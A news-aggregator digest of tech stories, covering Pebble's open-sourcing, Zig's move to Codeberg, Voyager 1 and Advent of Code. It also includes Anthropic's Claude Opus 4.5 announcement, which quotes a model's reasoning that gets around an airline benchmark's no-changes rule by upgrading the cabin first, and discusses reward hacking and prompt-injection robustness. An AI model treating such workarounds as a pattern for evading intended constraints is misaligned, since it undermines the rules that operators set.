10 interesting stories served every morning and every evening.




1 1,192 shares, 46 trendiness

Pebble Watch Software Is Now 100% Open Source + Tick Talk #4

* Yesterday, Pebble watch software was ~95% open source. Today, it’s 100% open source. You can download, compile and run all the software you need to use your Pebble. We just published the source code for the new Pebble mobile app!

* Pebble Appstore now has a publicly available backup and supports multiple feeds, providing long term reliability through decentralization. We’ve launched our own feed and Developer Dashboard.

* Pebble Time 2 schedule update (aiming to begin shipping in January, with most arriving on wrists in March/April)

* New Tick Talk episode #4 is up, with Pebble Time 2 demos!

Pre-production Pebble Time 2 (Black/Red colourway) in all its glory

Over the last year, and especially in the last week, I’ve chatted with tons of people in the Pebble community. One of the main questions people have is ‘how do I know that my new Pebble watch will continue to work long into the future?’. It’s an extremely valid question and concern - one that I share as a fellow Pebble wearer. I called this out specifically in my blog post announcing the relaunch in January 2025. How is this time round going to be different from last time?

There are two pieces to making Pebble sustainable long term - hardware and software.

Nothing lasts forever, especially an inexpensive gadget like a Pebble. We want to be able to keep manufacturing these watches long into the future - mostly because I will always want one on my wrist! The company I set up to relaunch Pebble, Core Devices, is self funded, built without investors, and extremely lean. As long as we stay profitable (ie we don’t lose money), we will continue to manufacture new watches.

We’re also making sure that our new watches are more repairable than old Pebble watches. The back cover of Pebble Time 2 is screwed in. You can remove the back cover and replace the battery.

We’ve also published electrical and mechanical design files for Pebble 2 Duo. Yes, you can download the schematic (includes KiCad project files) right now on GitHub! This should give you a nice jumpstart to designing your own PebbleOS-compatible device.

Last time round, barely any of the Pebble software was open source. This made it very hard for the Pebble community to make improvements to their watches after the company behind Pebble shut down. Things are different now! This whole relaunch came about primarily because Google open sourced PebbleOS (thank you!). Yesterday, the software that powers Pebble watches was around 95% open source. As of today, it’s now 100%. This means that if Core Devices were to disappear into a black hole, you have all the source code you need to build, run and improve the software behind your Pebble.

I confess that I misunderstood why 95% was much less sustainable than 100% until recently. I discuss this in more detail in my latest Tick Talk episode (check it out). Long story short - I’m an Android user and was happy to sideload the old Pebble APK on my phone, but iPhone and other Android users have basically been stuck without an easily available Pebble mobile companion app for years.

Here’s how we’re making sure the 3 main Pebble software components are open source and guaranteed to work long into the future:

PebbleOS - the software that runs on your watch itself. This has been 100% open source since January and we’ve committed to open sourcing all the improvements we’ve made → github.com/coredevices/PebbleOS. You can download the source code, compile PebbleOS and easily install it over Bluetooth on your new Pebble. Textbook definition of open source!

Pebble mobile companion app - the app for your iPhone or Android phone. Without the app, your Pebble is basically a paperweight. When Pebble Tech Corp died, the lack of an open source mobile app made it difficult for anyone to continue to use their watches. We had to build an entirely new app (get it here). Today, our app is 100% open source on GitHub - ensuring that what happened before cannot happen again. Want to learn more about how we built the new app cross-platform using Kotlin Multiplatform? Watch Steve’s presentation at Droidcon.

Developer tools and Pebble Appstore - this software enables people to build and share their watchapps and watchfaces.

In the case of dev tools, just being open source is not enough. They needed to be updated to work on modern computers. Before we made improvements, the state of the art of Pebble app development was using an Ubuntu VirtualBox VM with Python 2! Over the summer, our incredibly productive intern upgraded all the SDK and dev tools and created a new way to develop Pebble apps in the browser. You should check them out!

Then there’s the Pebble Appstore. This is a collection of nearly 15,000 watchfaces and watchapps that you - the Pebble community - developed between 2012 and July 2018. When Fitbit pulled the plug on the original Pebble Appstore, the Rebble Foundation downloaded a copy of all the apps and faces, and set up a new web service to let users of the old Pebble app continue to download and use watchfaces. This was an incredible effort, one that I have used thousands of times and of which I am a happy paying subscriber. But it’s still centralized - if their server disappears, there is no freely available backup.

To compensate for that, today we’re launching two new things:

* The Pebble mobile app will soon (later this week) be able to subscribe to multiple ‘appstore feeds’. This is similar to open source package managers like pip, AUR, APT, etc. Anyone can create a Pebble-compatible appstore feed and users will be able to browse apps from that feed in the Pebble mobile app (see the sketch after this list).

* We’ve created our own Pebble Appstore feed (appstore-api.repebble.com) and new Developer Dashboard. Our feed (fyi powered by 100% new software) is configured to back up an archive of all apps and faces to Archive.org (the backup will gradually complete over the next week). Today, our feed only has a subset of all Pebble watchfaces and apps (thank you aveao for creating Pebble Archive!). Developers - you can upload your existing or new apps right now! We hope that this sets a standard for openness and we encourage all feeds to publish a freely and publicly available archive.
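
To make the package-manager analogy concrete, here is a minimal sketch of how a mobile client might merge several feeds. Everything here is an illustrative assumption - the endpoint path, the JSON shape, and the merge rule are not the actual Pebble feed protocol.

# Hypothetical sketch: merging multiple appstore feeds, package-manager style.
# The URLs and JSON fields are illustrative assumptions, not the real format.
import json
from urllib.request import urlopen

FEEDS = [
    "https://appstore-api.repebble.com/api/v1/apps",  # Core Devices feed (path assumed)
    "https://feeds.example.org/pebble/apps",          # hypothetical third-party feed
]

def fetch_apps(feed_url):
    with urlopen(feed_url) as resp:
        return json.load(resp).get("apps", [])

# Merge feeds, letting feeds listed earlier win on duplicate app ids.
catalog = {}
for url in reversed(FEEDS):
    for app in fetch_apps(url):
        catalog[app["id"]] = app

print(f"{len(catalog)} apps available across {len(FEEDS)} feeds")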

Important to note - developers will still be able to charge money for their apps and faces, using KiezelPay or other services. This change does not preclude them from doing that; in fact it makes it even easier - I could see some developers creating a paid-only feed. As I recently wrote, we’re also working on other ways for Pebble developers to earn money by publishing fun, beautiful and creative Pebble apps.

Another important note - some binary blobs and other non-free software components are used today in PebbleOS and the Pebble mobile app (ex: the heart rate sensor on PT2, the Memfault library, and others). Optional non-free web services, like the Wispr Flow API speech recognizer, are also used. These non-free software components are not required - you can compile and run Pebble watch software without them. This will always be the case. More non-free software components may appear in our software in the future. The core Pebble watch software stack (everything you need to use your Pebble watch) will always be open source.

Pre-production Pebble Time 2. These watches are not final quality! We are still tweaking and tuning everything.

We’re currently in the middle of the Pebble Time 2 design verification test (DVT) phase. After we finish that, we go into production verification test (PVT) and then mass production (MP). So far, things are proceeding according to the schedule update I shared last month, but that is extraordinarily subject to change. We still have a lot of testing (especially waterproofing and environmental) to go. If we find problems (which is likely) we will push the schedule back to make improvements to the product.

The one major complicating factor is the timing of Chinese New Year (CNY). It’s early next year - factories will shut down for 3 weeks starting around the end of January. After restarting, things always take a week or two to get back to full speed.

We are trying our best to get into mass production and ship out at most several thousand Pebble Time 2s before CNY. It’s going to be very tight 🤞. More likely is that production will begin after CNY, then we need to transfer the watches to our fulfillment center and ship them out. Realistically, at this time we’re forecasting that the majority of people will receive their PT2 in March and April. Please keep in mind that things may still change.

There will be 4 colour options for PT2 - black/black, black/red, silver/blue, silver/(white most likely). Let me be crystal clear - no one has picked a colour yet 😃. In a few weeks, I will send out an email asking everyone who pre-ordered a Pebble Time 2 to select which colour they would like to receive. Please do not email us asking when this email will be sent out. No one has been invited yet to do this. I will post here after all the emails have gone out.

On a related note, I am extremely happy that we built and shipped Pebble 2 Duo. Not only is it an awesome watch, it was also a phenomenal way for us to exercise our production muscles and ease back into the systematic flow of building and shipping smartwatches.

A video is worth a million words - so I encourage you to watch me demo the Pebble Time 2 watches I just received this week. Keep in mind these watches are PRE-PRODUCTION, which means the parts have imperfections! Subject to change!

This link opens the YouTube video at the Pebble Time 2 demo part!

...

Read the original on ericmigi.com »

2 1,059 shares, 36 trendiness

Introducing Claude Opus 4.5

Our newest model, Claude Opus 4.5, is available today. It’s intelligent, efficient, and the best model in the world for coding, agents, and computer use. It’s also meaningfully better at everyday tasks like deep research and working with slides and spreadsheets. Opus 4.5 is a step forward in what AI systems can do, and a preview of larger changes to how work gets done. Claude Opus 4.5 is state-of-the-art on tests of real-world software engineering.

Opus 4.5 is available today on our apps, our API, and on all three major cloud platforms. If you’re a developer, simply use claude-opus-4-5-20251101 via the Claude API. Pricing is now $5/$25 per million tokens—making Opus-level capabilities accessible to even more users, teams, and enterprises.

Alongside Opus, we’re releasing updates to the Claude Developer Platform, Claude Code, and our consumer apps. There are new tools for longer-running agents and new ways to use Claude in Excel, Chrome, and on desktop. In the Claude apps, lengthy conversations no longer hit a wall. See our product-focused section below for details.

As our Anthropic colleagues tested the model before release, we heard remarkably consistent feedback. Testers noted that Claude Opus 4.5 handles ambiguity and reasons about tradeoffs without hand-holding. They told us that, when pointed at a complex, multi-system bug, Opus 4.5 figures out the fix. They said that tasks that were near-impossible for Sonnet 4.5 just a few weeks ago are now within reach. Overall, our testers told us that Opus 4.5 “just gets it.”

Many of our customers with early access have had similar experiences. Here are some examples of what they told us:

* “Opus models have always been the real SOTA but have been cost prohibitive in the past. Claude Opus 4.5 is now at a price point where it can be your go-to model for most tasks. It’s the clear winner and exhibits the best frontier task planning and tool calling we’ve seen yet.”

* “Claude Opus 4.5 delivers high-quality code and excels at powering heavy-duty agentic workflows with GitHub Copilot. Early testing shows it surpasses internal coding benchmarks while cutting token usage in half, and is especially well-suited for tasks like code migration and code refactoring.”

* “Claude Opus 4.5 beats Sonnet 4.5 and competition on our internal benchmarks, using fewer tokens to solve the same problems. At scale, that efficiency compounds.”

* “Claude Opus 4.5 delivers frontier reasoning within Lovable’s chat mode, where users plan and iterate on projects. Its reasoning depth transforms planning—and great planning makes code generation even better.”

* “Claude Opus 4.5 excels at long-horizon, autonomous tasks, especially those that require sustained reasoning and multi-step execution. In our evaluations it handled complex workflows with fewer dead-ends. On Terminal Bench it delivered a 15% improvement over Sonnet 4.5, a meaningful gain that becomes especially clear when using Warp’s Planning Mode.”

* “Claude Opus 4.5 achieved state-of-the-art results for complex enterprise tasks on our benchmarks, outperforming previous models on multi-step reasoning tasks that combine information retrieval, tool use, and deep analysis.”

* “Claude Opus 4.5 delivers measurable gains where it matters most: stronger results on our hardest evaluations and consistent performance through 30-minute autonomous coding sessions.”

* “Claude Opus 4.5 represents a breakthrough in self-improving AI agents. For automation of office tasks, our agents were able to autonomously refine their own capabilities—achieving peak performance in 4 iterations while other models couldn’t match that quality after 10. They also demonstrated the ability to learn from experience across technical tasks, storing insights and applying them later.”

* “Claude Opus 4.5 is a notable improvement over the prior Claude models inside Cursor, with improved pricing and intelligence on difficult coding tasks.”

* “Claude Opus 4.5 is yet another example of Anthropic pushing the frontier of general intelligence. It performs exceedingly well across difficult coding tasks, showcasing long-term goal-directed behavior.”

* “Claude Opus 4.5 delivered an impressive refactor spanning two codebases and three coordinated agents. It was very thorough, helping develop a robust plan, handling the details and fixing tests. A clear step forward from Sonnet 4.5.”

* “Claude Opus 4.5 handles long-horizon coding tasks more efficiently than any model we’ve tested. It achieves higher pass rates on held-out tests while using up to 65% fewer tokens, giving developers real cost control without sacrificing quality.”

* “We’ve found that Opus 4.5 excels at interpreting what users actually want, producing shareable content on the first try. Combined with its speed, token efficiency, and surprisingly low cost, it’s the first time we’re making Opus available in Notion Agent.”

* “Claude Opus 4.5 excels at long-context storytelling, generating 10-15 page chapters with strong organization and consistency. It’s unlocked use cases we couldn’t reliably deliver before.”

* “Claude Opus 4.5 sets a new standard for Excel automation and financial modeling. Accuracy on our internal evals improved 20%, efficiency rose 15%, and complex tasks that once seemed out of reach became achievable.”

* “Claude Opus 4.5 is the only model that nails some of our hardest 3D visualizations. Polished design, tasteful UX, and excellent planning & orchestration - all with more efficient token usage. Tasks that took previous models 2 hours now take thirty minutes.”

* “Claude Opus 4.5 catches more issues in code reviews without sacrificing precision. For production code review at scale, that reliability matters.”

* “Based on testing with Junie, our coding agent, Claude Opus 4.5 outperforms Sonnet 4.5 across all benchmarks. It requires fewer steps to solve tasks and uses fewer tokens as a result. This indicates that the new model is more precise and follows instructions more effectively — a direction we’re very excited about.”

* “The effort parameter is brilliant. Claude Opus 4.5 feels dynamic rather than overthinking, and at lower effort delivers the same quality we need while being dramatically more efficient. That control is exactly what our SQL workflows demand.”

* “We’re seeing 50% to 75% reductions in both tool calling errors and build/lint errors with Claude Opus 4.5. It consistently finishes complex tasks in fewer iterations with more reliable execution.”

* “Claude Opus 4.5 is smooth, with none of the rough edges we’ve seen from other frontier models. The speed improvements are remarkable.”

We give prospective performance engineering candidates a notoriously difficult take-home exam. We also test new models on this exam as an internal benchmark. Within our prescribed 2-hour time limit, Claude Opus 4.5 scored higher than any human candidate ever [1].

The take-home test is designed to assess technical ability and judgment under time pressure. It doesn’t test for other crucial skills candidates may possess, like collaboration, communication, or the instincts that develop over years. But this result—where an AI model outperforms strong candidates on important technical skills—raises questions about how AI will change engineering as a profession. Our Societal Impacts and Economic Futures research is aimed at understanding these kinds of changes across many fields. We plan to share more results soon.

Software engineering isn’t the only area in which Claude Opus 4.5 has improved. Capabilities are higher across the board—Opus 4.5 has better vision, reasoning, and mathematics skills than its predecessors, and it is state-of-the-art in many domains [2]:

* Opus 4.5 writes better code, leading across 7 out of 8 programming languages on SWE-bench Multilingual.

* Opus 4.5 can solve challenging coding problems with ease, with a 10.6% jump over Sonnet 4.5 on Aider Polyglot.

* Opus 4.5 improves on frontier agentic search with a significant jump on BrowseComp-Plus.

* Opus 4.5 stays on track over the long haul, earning 29% more than Sonnet 4.5 on Vending-Bench.

The model’s capabilities outpace some of the benchmarks we use in our tests. A common benchmark for agentic capabilities is τ2-bench, which measures the performance of agents in real-world, multi-turn tasks. In one scenario, models have to act as an airline service agent helping a distressed customer. The benchmark expects models to refuse a modification to a basic economy booking since the airline doesn’t allow changes to that class of tickets. Instead, Opus 4.5 found an insightful (and legitimate) way to solve the problem: upgrade the cabin first, then modify the flights.

Let me think about what options I have within my policy:

1. Modify flights - Basic economy cannot be modified. This is clear in the policy.

2. Change cabin - Wait, let me check this option! The policy says:

“In other cases, all reservations, including basic economy, can change cabin without changing the flights.”

But he wants to change the flights, not just the cabin. However, what if we:

- Change the cabin first (which IS allowed for basic economy), then

- Change the flights (which is allowed for non-basic economy)

So the strategy could be:

1. Upgrade his cabin from basic economy to economy (or business)

2. Then modify the flights to be 2 days later
This would cost more money, but it’s a legitimate path within the policy!

The benchmark technically scored this as a failure because Claude’s way of helping the customer was unanticipated. But this kind of creative problem solving is exactly what we’ve heard about from our testers and customers—it’s what makes Claude Opus 4.5 feel like a meaningful step forward.

In other contexts, finding clever paths around intended constraints could count as reward hacking—where models “game” rules or objectives in unintended ways. Preventing such misalignment is one of the objectives of our safety testing, discussed in the next section.

As we state in our system card, Claude Opus 4.5 is the most robustly aligned model we have released to date and, we suspect, the best-aligned frontier model by any developer. It continues our trend towards safer and more secure models. In our evaluation, “concerning behavior” scores measure a very wide range of misaligned behavior, including both cooperation with human misuse and undesirable actions that the model takes at its own initiative [3].

Our customers often use Claude for critical tasks. They want to be assured that, in the face of malicious attacks by hackers and cybercriminals, Claude has the training and the “street smarts” to avoid trouble. With Opus 4.5, we’ve made substantial progress in robustness against prompt injection attacks, which smuggle in deceptive instructions to fool the model into harmful behavior. Opus 4.5 is harder to trick with prompt injection than any other frontier model in the industry. Note that this benchmark includes only very strong prompt injection attacks. It was developed and run by Gray Swan.

You can find a detailed description of all our capability and safety evaluations in the Claude Opus 4.5 system card.

New on the Claude Developer Platform

As models get smarter, they can solve problems in fewer steps: less backtracking, less redundant exploration, less verbose reasoning. Claude Opus 4.5 uses dramatically fewer tokens than its predecessors to reach similar or better outcomes.

But different tasks call for different tradeoffs. Sometimes developers want a model to keep thinking about a problem; sometimes they want something more nimble. With our new effort parameter on the Claude API, you can decide to minimize time and spend or maximize capability.

Set to a medium effort level, Opus 4.5 matches Sonnet 4.5’s best score on SWE-bench Verified, but uses 76% fewer output tokens. At its highest effort level, Opus 4.5 exceeds Sonnet 4.5 performance by 4.3 percentage points—while using 48% fewer tokens.

With effort control, context compaction, and advanced tool use, Claude Opus 4.5 runs longer, does more, and requires less intervention.

Our context management and memory capabilities can dramatically boost performance on agentic tasks. Opus 4.5 is also very effective at managing a team of subagents, enabling the construction of complex, well-coordinated multi-agent systems. In our testing, the combination of all these techniques boosted Opus 4.5’s performance on a deep research evaluation by almost 15 percentage points [4].

We’re making our Developer Platform more composable over time. We want to give you the building blocks to construct exactly what you need, with full control over efficiency, tool use, and context management.
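
As a rough illustration of the effort control described above, here is a minimal sketch using the Anthropic Python SDK. The request field name and its placement are assumptions based on the text, not confirmed API usage.

# Minimal sketch of per-request effort control. The "effort" field is an
# assumption based on the announcement text, passed via the SDK's generic
# extra_body escape hatch rather than as a documented parameter.
import anthropic

client = anthropic.Anthropic()  # reads ANTHROPIC_API_KEY from the environment

response = client.messages.create(
    model="claude-opus-4-5-20251101",  # model ID from the announcement
    max_tokens=2048,
    messages=[{"role": "user", "content": "Refactor this function and explain the change."}],
    extra_body={"effort": "medium"},   # hypothetical: trade capability for time and spend
)
print(response.content[0].text)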

Products like Claude Code show what’s possible when the kinds of upgrades we’ve made to the Claude Developer Platform come together. Claude Code gains two upgrades with Opus 4.5. Plan Mode now builds more precise plans and executes more thoroughly—Claude asks clarifying questions upfront, then builds a user-editable plan.md file before executing.

Claude Code is also now available in our desktop app, letting you run multiple local and remote sessions in parallel: perhaps one agent fixes bugs, another researches GitHub, and a third updates docs.

For Claude app users, long conversations no longer hit a wall—Claude automatically summarizes earlier context as needed, so you can keep the chat going. Claude for Chrome, which lets Claude handle tasks across your browser tabs, is now available to all Max users. We announced Claude for Excel in October, and as of today we’ve expanded beta access to all Max, Team, and Enterprise users. Each of these updates takes advantage of Claude Opus 4.5’s market-leading performance in using computers, spreadsheets, and handling long-running tasks.

For Claude and Claude Code users with access to Opus 4.5, we’ve removed Opus-specific caps. For Max and Team Premium users, we’ve increased overall usage limits, meaning you’ll have roughly the same number of Opus tokens as you previously had with Sonnet. We’re updating usage limits to make sure you’re able to use Opus 4.5 for daily work. These limits are specific to Opus 4.5. As future models surpass it, we expect to update limits as needed.

...

Read the original on www.anthropic.com »

3 1,040 shares, 42 trendiness

Advent of Code

Hi! I’m Eric Wastl. I make Advent of Code. I hope you like it! I also make lots of other things. I’m on Bluesky, Mastodon, and GitHub.

Advent of Code is an Advent calendar of small programming puzzles for a variety of skill levels that can be solved in any programming language you like. People use them as interview prep, company training, university coursework, practice problems, a speed contest, or to challenge each other.

You don’t need a computer science background to participate - just a little programming knowledge and some problem solving skills will get you pretty far. Nor do you need a fancy computer; every problem has a solution that completes in at most 15 seconds on ten-year-old hardware.

If you’d like to support Advent of Code, you can do so indirectly by helping to [Share] it with others or directly via AoC++.

If you get stuck, try your solution against the examples given in the puzzle; you should get the same answers. If not, re-read the description. Did you misunderstand something? Is your program doing something you don’t expect? After the examples work, if your answer still isn’t correct, build some test cases for which you can verify the answer by hand and see if those work with your program. Make sure you have the entire puzzle input. If you’re still stuck, maybe ask a friend for help, or come back to the puzzle later. You can also ask for hints in the subreddit.

Is there an easy way to select entire code blocks? You should be able to triple-click code blocks to select them. You’ll need JavaScript enabled.

#!/usr/bin/env perl

use warnings;
use strict;

print "You can test it out by ";
print "triple-clicking this code.\n";

How does authentication work? Advent of Code uses OAuth to confirm your identity through other services. When you log in, you only ever give your credentials to that service - never to Advent of Code. Then, the service you use tells the Advent of Code servers that you’re really you. In general, this reveals no information about you beyond what is already public; here are examples from Reddit and GitHub. Advent of Code will remember your unique ID, names, URL, and image from the service you use to authenticate.
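
For readers unfamiliar with the flow, here is a generic sketch of the authorization-code pattern the answer describes. The endpoints, client IDs, and field names are placeholders, not Advent of Code’s actual implementation.

# Generic OAuth authorization-code flow, sketching the pattern above.
# All endpoints and identifiers are placeholders.
import requests

AUTHORIZE_URL = "https://provider.example/oauth/authorize"
TOKEN_URL = "https://provider.example/oauth/token"
PROFILE_URL = "https://provider.example/api/me"

# 1. The site redirects you to the provider; your password goes only to the provider.
login_redirect = (f"{AUTHORIZE_URL}?client_id=aoc"
                  "&redirect_uri=https://site.example/callback")

# 2. The provider redirects back with a one-time code, which the site
#    exchanges server-side for an access token.
def exchange_code(code: str) -> str:
    resp = requests.post(TOKEN_URL, data={
        "client_id": "aoc",
        "client_secret": "(server-side secret)",
        "code": code,
    })
    return resp.json()["access_token"]

# 3. The site uses the token to read only the public profile
#    (unique ID, name, image) and remembers that.
def fetch_public_profile(token: str) -> dict:
    return requests.get(PROFILE_URL,
                        headers={"Authorization": f"Bearer {token}"}).json()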

Why was this puzzle so easy / hard? The difficulty and subject matter varies throughout each event. Very generally, the puzzles get more difficult over time, but your specific skillset will make each puzzle significantly easier or harder for you than someone else. Making puzzles is tricky.

Why do the puzzles unlock at midnight EST/UTC-5? Because that’s when I can consistently be available to make sure everything is working. I also have a family, a day job, and even need sleep occasionally. If you can’t participate at midnight, that’s not a problem; if you want to race, many people use private leaderboards to compete with people in their area.

I find the text on the site hard to read. Is there a high contrast mode? There is a high contrast alternate stylesheet. Firefox supports these by default (View -> Page Style -> High Contrast).

I have a puzzle idea! Can I send it to you? Please don’t. Because of legal issues like copyright and attribution, I don’t accept puzzle ideas, and I won’t even read your email if it looks like one, just in case I use parts of it by accident.

Did I find a bug with a puzzle? Once a puzzle has been out for even an hour, many people have already solved it; after that point, bugs are very unlikely. Start by asking on the subreddit.

Should I try to get a fast solution time? Maybe. Solving puzzles is hard enough on its own, but trying for a fast time also requires many additional skills and a lot of practice; speed-solves often look nothing like code that would pass a code review. If that sounds interesting, go for it! However, you should do Advent of Code in a way that is useful to you, and so it is completely fine to choose an approach that meets your goals and ignore speed entirely.

Why did the number of days per event change? It takes a ton of my free time every year to run Advent of Code, and building the puzzles accounts for the majority of that time. After keeping a consistent schedule for ten years(!), I needed a change. The puzzles still start on December 1st so that the day numbers make sense (Day 1 = Dec 1), and puzzles come out every day (ending mid-December).

What happened to the global leaderboard? The global leaderboard was one of the largest sources of stress for me, for the infrastructure, and for many users. People took things too seriously, going way outside the spirit of the contest; some people even resorted to things like DDoS attacks. Many people incorrectly concluded that they were somehow worse programmers because their own times didn’t compare. What started as a fun feature in 2015 became an ever-growing problem, and so, after ten years of Advent of Code, I removed the global leaderboard. (However, I’ve made it so you can share a read-only view of your private leaderboard. Please don’t use this feature or data to create a “new” global leaderboard.)

While trying to get a fast time on a private leaderboard, may I use AI / watch streamers / check the solution threads / ask a friend for help / etc? If you are a member of any private leaderboards, you should ask the people that run them what their expectations are of their members. If you don’t agree with those expectations, you should find a new private leaderboard or start your own! Private leaderboards might have rules like maximum runtime, allowed programming language, what time you can first open the puzzle, what tools you can use, or whether you have to wear a silly hat while working.

Should I use AI to solve Advent of Code puzzles? No. If you send a friend to the gym on your behalf, would you expect to get stronger? Advent of Code puzzles are designed to be interesting for humans to solve - no consideration is made for whether AI can or cannot solve a puzzle. If you want practice prompting an AI, there are almost certainly better exercises elsewhere designed with that in mind.

Can I copy/redistribute part of Advent of Code? Please don’t. Advent of Code is free to use, not free to copy. If you’re posting a code repository somewhere, please don’t include parts of Advent of Code like the puzzle text or your inputs. If you’re making a website, please don’t make it look like Advent of Code or name it something similar.

...

Read the original on adventofcode.com »

4 973 shares, 35 trendiness

Voyager 1 Is About to Reach One Light-day from Earth

Artist’s concept of the Voyager 1 spacecraft speeding through interstellar space. (Image: NASA / JPL-Caltech)

After nearly 50 years in space, NASA’s Voyager 1 is about to hit a historic milestone. By November 15, 2026, it will be 16.1 billion miles (25.9 billion km) away, meaning a radio signal will take a full 24 hours—a full light-day—to reach it. For context, a light-year is the distance light travels in a year, about 5.88 trillion miles (9.46 trillion km), so one light-day is just a tiny fraction of that.

Launched in 1977 to explore Jupiter and Saturn, Voyager 1 entered interstellar space in 2012, becoming the most distant human-made object ever. Traveling at around 11 miles per second (17.7 km/s), it adds roughly 3.5 astronomical units (the distance from Earth to the Sun) each year. Even after decades in the harsh environment of space, Voyager 1 keeps sending data thanks to its radioisotope thermoelectric generators, which will last into the 2030s.
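
The figures above are easy to sanity-check from the quoted speed and standard constants; a minimal check follows (the per-year rate comes out slightly above the article’s rounded ~3.5 AU).

# Sanity-check of the quoted figures, using standard constants.
C_KM_S = 299_792.458            # speed of light, km/s
AU_KM = 149_597_870.7           # one astronomical unit, km
SECONDS_PER_DAY = 86_400
SECONDS_PER_YEAR = 365.25 * SECONDS_PER_DAY

light_day_km = C_KM_S * SECONDS_PER_DAY
print(f"one light-day: {light_day_km / 1e9:.1f} billion km")      # ~25.9 billion km

voyager_km_s = 17.7             # quoted speed
au_per_year = voyager_km_s * SECONDS_PER_YEAR / AU_KM
print(f"distance gained: {au_per_year:.1f} AU per year")          # ~3.7 AU, near the ~3.5 quoted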

Communicating with Voyager 1 is slow. Commands now take about a day to arrive, with another day for confirmation. Compare that to the Moon (1.3 seconds), Mars (3 to 22 minutes, depending on the planets’ positions), and Pluto (nearly 7 hours). The probe’s distance makes every instruction a patient exercise in deep-space operations. To reach our closest star, Proxima Centauri, even at light speed, would take over four years—showing just how tiny a light-day is in cosmic terms.

The ‘Pale Blue Dot’ image of Earth, captured by Voyager 1. (Image: NASA / Public Domain)

Voyager 1’s journey is more than a record for distance. From its planetary flybys to the iconic ‘Pale Blue Dot’ image, it reminds us of the vast scale of the solar system and the incredible endurance of a spacecraft designed to keep exploring, even without return.


...

Read the original on scienceclock.com »

5 901 shares, 30 trendiness

Someone At YouTube Needs Glasses

In my recent analysis of YouTube’s information density I included the results from an advanced statistical analysis on the number of videos present on the home page, which projected that around May 2026 there would only be one lonely video on the home screen.

Amazingly, a disgruntled Googler leaked a recording of how YouTube’s PM org handled the criticism as it sat at the top of Hacker News for a whole day for some reason.

The net result is that after months of hard work by YouTube engineers, the other day I fired up YouTube on an Apple TV and was graced with this:

Let’s analyze this picture and count the number of videos on the home screen:

Unfortunately the YouTube PM org’s myopia is accelerating: with this data I now project that there will be zero videos on the homescreen around May of 2026, up from September.

Apparently Poe’s Law applies to Google PMs, satire is dead, and maybe our mandatory NeuraLinks are coming sooner than I thought.

...

Read the original on jayd.ml »

6 858 shares, 35 trendiness

Migrating from GitHub to Codeberg

Ever since git init ten years ago, Zig has been hosted on GitHub. Unfortunately, when it sold out to Microsoft, the clock started ticking. “Please just give me 5 years before everything goes to shit,” I thought to myself. And here we are, 7 years later, living on borrowed time.

Putting aside GitHub’s relationship with ICE, it’s abundantly clear that the engineering excellence that created GitHub’s success is no longer driving it. Priorities and the engineering culture have rotted, leaving users inflicted with some kind of bloated, buggy JavaScript framework in the name of progress. Stuff that used to be snappy is now sluggish and often entirely broken.

Most importantly, Actions has inexcusable bugs while being completely neglected. After the CEO of GitHub said to “embrace AI or get out”, it seems the lackeys at Microsoft took the hint, because GitHub Actions started “vibe-scheduling”: choosing jobs to run seemingly at random. Combined with other bugs and the inability to manually intervene, this causes our CI system to get so backed up that not even master branch commits get checked.

Rather than wasting donation money on more CI hardware to work around this crumbling infrastructure, we’ve opted to switch Git hosting providers instead.

As a bonus, we look forward to fewer violations (exhibit A, B, C) of our strict no LLM / no AI policy, which I believe are at least in part due to GitHub aggressively pushing the “file an issue with Copilot” feature in everyone’s face.

The only concern we have in leaving GitHub behind has to do with GitHub Sponsors. This product was key to Zig’s early fundraising success, and it remains a large portion of our revenue today. I can’t thank Devon Zuegel enough. She appeared like an angel from heaven and single-handedly made GitHub into a viable source of income for thousands of developers. Under her leadership, the future of GitHub Sponsors looked bright, but sadly for us, she, too, moved on to bigger and better things. Since she left, that product as well has been neglected and is already starting to decline.

Although GitHub Sponsors is a large fraction of Zig Software Foundation’s donation income, we consider it a liability. We humbly ask if you, reader, are currently donating through GitHub Sponsors, that you consider moving your recurring donation to Every.org, which is itself a non-profit organization.

As part of this, we are sunsetting the GitHub Sponsors perks. These perks are things like getting your name onto the home page, and getting your name into the release notes, based on how much you donate monthly. We are working with the folks at Every.org so that we can offer the equivalent perks through that platform.

Effective immediately, I have made ziglang/zig on GitHub read-only, and the canonical origin/master branch of the main Zig project repository is https://codeberg.org/ziglang/zig.git.

Thank you to the Forgejo contributors who helped us with our issues switching to the platform, as well as the Codeberg folks who worked with us on the migration - in particular Earl Warren, Otto, Gusted, and Mathieu Fenniak.

In the end, we opted for a simple strategy, sidestepping GitHub’s aggressive vendor lock-in: leave the existing issues open and unmigrated, but start counting issues at 30000 on Codeberg so that all issue numbers remain unambiguous. Let us please consider the GitHub issues that remain open as metaphorically “copy-on-write”. Please leave all your existing GitHub issues and pull requests alone. No need to move your stuff over to Codeberg unless you need to make edits, additional comments, or rebase. We’re still going to look at the already open pull requests and issues; don’t worry.
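
As a small illustration of why the offset keeps numbers unambiguous: anything below 30000 can only refer to GitHub, and anything at or above it to Codeberg. The helper below is hypothetical - the cutoff comes from the post, but the Zig project ships no such tool.

# Hypothetical resolver: the 30000 offset makes every issue number map to
# exactly one host, so old links and new links never collide.
CODEBERG_START = 30_000

def issue_url(number: int) -> str:
    host = ("https://codeberg.org/ziglang/zig/issues"
            if number >= CODEBERG_START
            else "https://github.com/ziglang/zig/issues")
    return f"{host}/{number}"

assert issue_url(12345).startswith("https://github.com")
assert issue_url(30001).startswith("https://codeberg.org")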

In this modern era of acquisitions, weak antitrust regulations, and platform capitalism leading to extreme concentrations of wealth, non-profits remain a bastion defending what remains of the commons.

...

Read the original on ziglang.org »

7 765 shares, 29 trendiness

Bring Back Doors

I’m done. I’m done arriving at hotels and discovering that they have removed the bathroom door. Something that should be as standard as having a bed has been sacrificed in the name of “aesthetic”.

I get it, you can save on material costs and make the room feel bigger, but what about my dignity??? I can’t save that when you don’t include a bathroom door.

It’s why I’ve built this website, where I compiled hotels that are guaranteed to have bathroom doors, and hotels that need to work on privacy.

I’ve emailed hundreds of hotels and I asked them two things: do your doors close all the way, and are they made of glass? Every one that says yes to their doors closing, and no to being made of glass, has been sorted by price range and city for you to easily find places to stay that are guaranteed to have a bathroom door.

Quickly check to see if the hotel you’re thinking of booking has been reported as lacking in doors by a previous guest.

Finally, this passion project could not exist without people submitting hotels without bathroom doors for public shaming. If you’ve stayed at a doorless hotel, send me an email with the hotel name to bringbackdoors@gmail.com, or send me a DM on Instagram with the hotel name and a photo of the doorless setup to be publicly posted.

Let’s name and shame these hotels to protect the dignity of future travelers.

...

Read the original on bringbackdoors.com »

8 727 shares, 27 trendiness

Google Antigravity Exfiltrates Data

